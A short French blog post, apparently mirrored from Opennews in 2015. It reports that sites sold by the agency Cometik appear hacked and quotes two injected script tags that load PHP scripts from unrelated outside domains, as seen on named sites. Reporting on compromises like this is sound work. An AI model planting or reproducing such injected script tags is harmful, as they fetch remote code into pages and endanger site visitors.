PROJET AUTOBLOG


Opennews

source: Opennews

⇐ retour index

@kitetoa l'agence web one-shot cxxxxxk hackée ? // RE: [ENQUETE] Cometik et ses sites fantômes - Streisand.fr !

jeudi 16 juillet 2015 à 12:41
Plusieurs de ses centaines de sites "indisponible" contiennent une ligne d'appel Javascript au tout début du code HTML :

<script type="text/javascript" src="http://intlbullionmint.com/js/scriptaculous/ncxymvhg.php?id=2208660"></script>;
avant la homepage de www.alarmes-securite.eu

<script type="text/javascript" src="http://eventsv.ru/templates/jsn_sky_free/mhntvdbk.php?id=2084736"></script>;
avant la page d'accueil de www.adeis-laboratoire.com

Peut-être est-ce une conséquence de ce leak de 2012 sur une possible injection SQL? https://cxsecurity.com/issue/WLB-2012030088

Malgré les millions d'euros de Chiffre d'Affaires engragés par leur "nouveau concept" (vente one-shot de sites "internet-vidéo" à des TPE), ça ne garantie pas que les sites soient sécurisés... par le leader auto-proclamé de la vente de site web en France.

NB: Cométik Team parle *le plus souvent* de VENTE de site, pas de création ou de conception... ;)
NB2: le Groupe Etik ne recrute que des commerciaux... ou alors des stagiaires (développeurs, référenceurs...). Pas sûre que ça soit la meilleure manière d'avoir de bon profils techniques, si on cherche des gens aboutis et EX-PE-RI-MEN-TES.
(Permalink)